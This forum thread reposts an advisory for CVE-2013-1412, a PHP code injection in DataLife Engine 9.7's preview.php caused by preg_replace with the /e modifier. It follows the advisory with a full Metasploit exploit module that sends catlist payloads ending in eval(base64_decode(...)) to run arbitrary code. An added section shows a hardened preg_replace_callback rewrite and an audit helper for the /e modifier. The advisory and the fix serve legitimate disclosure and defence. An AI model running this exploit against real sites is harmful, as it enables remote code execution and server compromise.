
DataLife Engine 9.7 (preview.php) PHP Code Injection Vulnerability

Thread in the section "Vulnerabilities of popular CMS", created by user Хулиган, 5 Feb 2013.

  1. Хулиган
    Хулиган Forum staff Advanced
    Likes:
    242
    Code:
    ------------------------------------------------------------------
    DataLife Engine 9.7 (preview.php) PHP Code Injection Vulnerability
    ------------------------------------------------------------------
     
    [-] Software Link:
     
    http://dleviet.com/
     
     
    [-] Affected Version:
     
    9.7 only.
     
     
    [-] Vulnerability Description:
     
    The vulnerable code is located in the /engine/preview.php script:
     
    246.    $c_list = implode (',', $_REQUEST['catlist']);
    247.
    248.    if( strpos( $tpl->copy_template, "[catlist=" ) !== false ) {
    249.        $tpl->copy_template = preg_replace( "#\\[catlist=(.+?)\\](.*?)\\[/catlist\\]#ies", "check_category('\\1', '\\2', '{$c_list}')", $tpl->copy_template );
    250.    }
    251.       
    252.    if( strpos( $tpl->copy_template, "[not-catlist=" ) !== false ) {
    253.        $tpl->copy_template = preg_replace( "#\\[not-catlist=(.+?)\\](.*?)\\[/not-catlist\\]#ies", "check_category('\\1', '\\2', '{$c_list}', false)", $tpl->copy_template );
    254.    }
     
    User supplied input passed through the $_REQUEST['catlist'] parameter is not properly
    sanitized before being used in a preg_replace() call with the e modifier at lines 249 and 253.
    This can be exploited to inject and execute arbitrary PHP code. Successful exploitation of
    this vulnerability requires a template which contains a “catlist” (or a “not-catlist”) tag.
     
     
    [-] Solution:
     
    Apply the vendor patch: http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html
     
     
    [-] Disclosure Timeline:
     
    [16/01/2013] - Vendor notified
    [19/01/2013] - Vendor patch released
    [20/01/2013] - CVE number requested
    [21/01/2013] - CVE number assigned
    [28/01/2013] - Public disclosure
     
     
    [-] CVE Reference:
     
    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the name CVE-2013-1412 to this vulnerability.
     
     
    [-] Credits:
     
    Vulnerability discovered by Egidio Romano.
     
     
    [-] Original Advisory:
     
    http://karmainsecurity.com/KIS-2013-01
    
    Code:
    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # web site for more information on licensing and terms of use.
    #   http://metasploit.com/
    ##
     
    require 'msf/core'
     
    class Metasploit3 < Msf::Exploit::Remote
        Rank = ExcellentRanking
     
        include Msf::Exploit::Remote::HttpClient
     
        def initialize(info = {})
            super(update_info(info,
                'Name'           => 'DataLife Engine preview.php PHP Code Injection',
                'Description'    => %q{
                        This module exploits a PHP code injection vulnerability in DataLife Engine 9.7.
                    The vulnerability exists in preview.php, due to an insecure usage of preg_replace()
                    with the e modifier, which allows injecting arbitrary PHP code when the template
                    in use contains a [catlist] or [not-catlist] tag.
                },
                'Author'         =>
                    [
                        'EgiX', # Vulnerability discovery
                        'juan vazquez' # Metasploit module
                    ],
                'License'        => MSF_LICENSE,
                'References'     =>
                    [
                        [ 'CVE', '2013-1412' ],
                        [ 'BID', '57603' ],
                        [ 'EDB', '24438' ],
                        [ 'URL', 'http://karmainsecurity.com/KIS-2013-01' ],
                        [ 'URL', 'http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html' ]
                    ],
                'Privileged'     => false,
                'Platform'       => ['php'],
                'Arch'           => ARCH_PHP,
                'Payload'        =>
                    {
                        'Keys'   => ['php']
                    },
                'DisclosureDate' => 'Jan 28 2013',
                'Targets'        => [ ['DataLife Engine 9.7', { }], ],
                'DefaultTarget'  => 0
                ))
     
            register_options(
                [
                    OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
                ], self.class)
        end
     
        def uri
            normalize_uri(target_uri.path, 'engine', 'preview.php')
        end
     
        def check
            fingerprint = rand_text_alpha(4+rand(4))
            res = send_request_cgi(
                {
                    'uri'       =>  uri,
                    'method'    => 'POST',
                    'vars_post' =>
                        {
                            'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||printf(\"#{fingerprint}\");//"
                        }
                })
     
            if res and res.code == 200 and res.body =~ /#{fingerprint}/
                return Exploit::CheckCode::Vulnerable
            else
                return Exploit::CheckCode::Safe
            end
        end
     
        def exploit
            @peer = "#{rhost}:#{rport}"
     
            print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code")
            res = send_request_cgi(
                {
                    'uri'       =>  uri,
                    'method'    => 'POST',
                    'vars_post' =>
                        {
                            'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//"
                        }
                })
        end
    end
    
     
    5 Feb 2013
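The block below is an added example and is not code from the advisory, from the Metasploit module, or from the DataLife Engine project. It shows the two preview.php replacements from lines 249 and 253 rewritten with preg_replace_callback(), the standard fix for the /e class of bug: the captured groups and the request-derived list reach check_category() as function arguments, so no part of the request is ever evaluated as PHP. check_category() is replaced by a stub of our own (DLE's real function is not reproduced), and the whitelist assumes catlist entries are numeric category ids; both are assumptions. A small audit function that flags preg_replace() calls whose pattern literal carries the e modifier is included for reviewing other code for the same defect. Requires PHP 7.4+ for arrow functions.

```php
<?php
declare(strict_types=1);

// Added example, not DLE's or the advisory's code. Hypothetical parts:
// check_category() is a stub standing in for DLE's real function, and the
// assumption that catlist entries are numeric category ids is ours.

// Stub with made-up semantics: return $body when the tag's category list
// intersects the request's list (or does not, when $positive is false).
function check_category(string $cats, string $body, string $c_list, bool $positive = true): string
{
    $wanted  = array_map('trim', explode(',', $cats));
    $present = array_map('trim', explode(',', $c_list));
    $hit = count(array_intersect($wanted, $present)) > 0;
    return ($hit === $positive) ? $body : '';
}

// Hardened rewrite of the two preview.php replacements. The /e modifier
// (deprecated in PHP 5.5, removed in 7.0) turned the replacement string,
// with $c_list interpolated into it, into PHP code. preg_replace_callback()
// hands the captured groups and $c_list to check_category() as plain
// arguments, so nothing taken from the request is evaluated.
function render_catlist(string $template, array $catlist): string
{
    // Whitelist the input first: assumed numeric ids, anything else is dropped.
    $ids = array_values(array_filter(array_map('intval', $catlist), fn(int $id): bool => $id > 0));
    $c_list = implode(',', $ids);

    $template = preg_replace_callback(
        '#\[catlist=(.+?)\](.*?)\[/catlist\]#is',
        fn(array $m): string => check_category($m[1], $m[2], $c_list),
        $template
    );
    $template = preg_replace_callback(
        '#\[not-catlist=(.+?)\](.*?)\[/not-catlist\]#is',
        fn(array $m): string => check_category($m[1], $m[2], $c_list, false),
        $template
    );
    return $template;
}

// Audit helper for the same bug class: report preg_replace() calls whose
// pattern literal carries the e modifier, with the line they sit on.
function find_e_modifier_calls(string $source): array
{
    // quote, delimiter, lazy pattern body, same delimiter, flags, same quote
    $regex = '/preg_replace\s*\(\s*(["\'])([^\w\s\\\\])(.*?)\2([a-zA-Z]*)\1/s';
    $hits = [];
    if (preg_match_all($regex, $source, $matches, PREG_SET_ORDER | PREG_OFFSET_CAPTURE)) {
        foreach ($matches as $m) {
            $flags = $m[4][0];
            if (strpos($flags, 'e') !== false) {
                $line = substr_count(substr($source, 0, $m[0][1]), "\n") + 1;
                $hits[] = ['line' => $line, 'flags' => $flags];
            }
        }
    }
    return $hits;
}

// Constructed demo template and inputs.
$tpl = '[catlist=3,5]cats 3 or 5[/catlist][not-catlist=3]not cat 3[/not-catlist]';
var_dump(render_catlist($tpl, ['3']));
var_dump(render_catlist($tpl, ['7']));
var_dump(render_catlist($tpl, ["3)'", 'abc'])); // quotes and parentheses are inert data here

// Constructed source fragment mirroring the advisory's lines 246 and 249,
// plus a hardened call, so the audit can be seen flagging only the /e call.
$src = <<<'SRC'
$c_list = implode(',', $_REQUEST['catlist']);
$tpl->copy_template = preg_replace( "#\\[catlist=(.+?)\\](.*?)\\[/catlist\\]#ies", "check_category('\\1', '\\2', '{$c_list}')", $tpl->copy_template );
$tpl->copy_template = preg_replace_callback( '#\[catlist=(.+?)\](.*?)\[/catlist\]#is', $cb, $tpl->copy_template );
SRC;
print_r(find_e_modifier_calls($src));
```

The third render_catlist() call yields the same result as the first: the whitelist reduces `"3)'"` to the id 3 and drops `abc`, and even without the whitelist the callback form would only ever see those characters as a string argument. The audit reports a single hit on line 2 of the constructed fragment (flags `ies`); the preg_replace_callback() line is not matched because the regex requires `preg_replace` to be followed directly by `(`.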
  2. chimchoca7
    chimchoca7 Newbie
    Likes:
    0
    discoveries or
     
    26 Aug 2013
